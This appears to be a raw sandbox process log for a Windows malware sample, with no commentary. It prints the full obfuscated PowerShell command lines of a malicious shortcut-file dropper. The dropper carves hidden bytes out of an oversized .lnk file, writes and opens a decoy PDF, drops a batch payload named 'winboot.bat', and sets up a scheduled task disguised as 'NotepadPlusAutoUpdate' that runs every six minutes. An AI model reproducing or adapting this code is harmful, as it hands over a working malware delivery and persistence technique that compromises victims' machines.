cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "tUrJsdJA" C:\Users\test22\AppData\Local\Temp\241007.lnk
2548cmd.exe "C:\Windows\syswow64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$xtTGE = Get-Location;if($xtTGE -Match 'System32' -or $xtTGE -Match 'Program Files') {$xtTGE = 'C:\Users\test22\AppData\Local\Temp'};$pz5FU74rLj=@('.lnk');$hkJ9aVpxO2V7gi = Get-ChildItem -Path $xtTGE -Recurse *.* -File | where {$_.extension -in $pz5FU74rLj} | where-object {$_.length -eq 0x02EE6666} | Select-Object -ExpandProperty FullName;$hCJgBhK9jtWsC = New-Object System.IO.FileStream($hkJ9aVpxO2V7gi, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$hCJgBhK9jtWsC.Seek(0x00001742, [System.IO.SeekOrigin]::Begin);$QfljwCakcmCVy1 = New-Object byte[] 0x0003A77A;$hCJgBhK9jtWsC.Read($QfljwCakcmCVy1, 0, 0x0003A77A);$KokfX0wnDm = $hkJ9aVpxO2V7gi.replace('.lnk','.pdf');sc $KokfX0wnDm $QfljwCakcmCVy1 -Encoding Byte;& $KokfX0wnDm;$hCJgBhK9jtWsC.Seek(0x0003BEBC, [System.IO.SeekOrigin]::Begin);$uf6YU1v4N=New-Object byte[] 0x00000E9B;$hCJgBhK9jtWsC.Read($uf6YU1v4N, 0, 0x00000E9B);$hCJgBhK9jtWsC.Close();$F61heDpmAIoK=$env:public+'\Libraries\winboot.b'+'a' +'t';$gN49UVvZbCvzq='cmd /q /c \\\"start \\\"NotePadPlus\\\" /min \\\"' + $F61heDpmAIoK + '\\\" '+[char][int]::Parse(38, 'Number')+[char][int]::Parse(38, 'Number')+' exit\\\"';schtasks /create /sc minute /mo 6 /tn 'NotepadPlusAutoUpdate' /tr $gN49UVvZbCvzq /f;sc $F61heDpmAIoK $uf6YU1v4N -Encoding Byte;&$F61heDpmAIoK;"&& exit
2680cmd.exe C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
2764powershell.exe C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$xtTGE = Get-Location;if($xtTGE -Match 'System32' -or $xtTGE -Match 'Program Files') {$xtTGE = 'C:\Users\test22\AppData\Local\Temp'};$pz5FU74rLj=@('.lnk');$hkJ9aVpxO2V7gi = Get-ChildItem -Path $xtTGE -Recurse *.* -File | where {$_.extension -in $pz5FU74rLj} | where-object {$_.length -eq 0x02EE6666} | Select-Object -ExpandProperty FullName;$hCJgBhK9jtWsC = New-Object System.IO.FileStream($hkJ9aVpxO2V7gi, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$hCJgBhK9jtWsC.Seek(0x00001742, [System.IO.SeekOrigin]::Begin);$QfljwCakcmCVy1 = New-Object byte[] 0x0003A77A;$hCJgBhK9jtWsC.Read($QfljwCakcmCVy1, 0, 0x0003A77A);$KokfX0wnDm = $hkJ9aVpxO2V7gi.replace('.lnk','.pdf');sc $KokfX0wnDm $QfljwCakcmCVy1 -Encoding Byte;& $KokfX0wnDm;$hCJgBhK9jtWsC.Seek(0x0003BEBC, [System.IO.SeekOrigin]::Begin);$uf6YU1v4N=New-Object byte[] 0x00000E9B;$hCJgBhK9jtWsC.Read($uf6YU1v4N, 0, 0x00000E9B);$hCJgBhK9jtWsC.Close();$F61heDpmAIoK=$env:public+'\Libraries\winboot.b'+'a' +'t';$gN49UVvZbCvzq='cmd /q /c \\\"start \\\"NotePadPlus\\\" /min \\\"' + $F61heDpmAIoK + '\\\" '+[char][int]::Parse(38, 'Number')+[char][int]::Parse(38, 'Number')+' exit\\\"';schtasks /create /sc minute /mo 6 /tn 'NotepadPlusAutoUpdate' /tr $gN49UVvZbCvzq /f;sc $F61heDpmAIoK $uf6YU1v4N -Encoding Byte;&$F61heDpmAIoK;"
2820